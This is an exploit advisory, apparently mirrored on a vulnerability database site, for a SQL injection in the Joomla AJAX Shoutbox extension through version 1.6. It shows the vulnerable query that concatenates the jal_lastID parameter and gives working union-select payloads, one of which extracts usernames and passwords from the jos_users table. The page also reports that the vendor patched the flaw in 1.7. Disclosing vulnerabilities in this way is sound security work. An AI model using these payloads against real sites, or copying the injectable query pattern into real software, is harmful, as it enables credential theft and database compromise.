Lucene search
K

Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 21 Views

Joomla AJAX Shoutbox 1.6 Remote SQL Injection Vuln

Code

                                                ###################################################################################
Joomla AJAX Shoutbox remote SQL Injection vulnerability

[-] Author: Ibrahim Raafat
[-] Contact: https://twitter.com/RaafatSEC
[-] Discovery date: 1 April 2010 [ 4 years ago ]
[-] Reported to vendor : 12 March 2014
[-] Response: Quick response from the developer, Patched and released version 1.7 in the same day
[-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43

[+] Details:
[-] include &#34;helper.php&#34;;
[-] parameter: jal_lastID
[-] Code: 
113	$jal_lastID = JRequest::getVar( &#39;jal_lastID&#39;,		0		 );
114
115	$query = &#39;SELECT * FROM #__shoutbox WHERE id &#62; &#39;.$jal_lastID.&#39; ORDER BY id DESC&#39;;

[-] Exploit: 
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -

Example:
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -

[+] An amazing tool to discover and exploit SQL Injection vulnerability [ Sculptor - sculptordev.com ]
Founded by https://twitter.com/MSM_1st

###################################################################################



                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation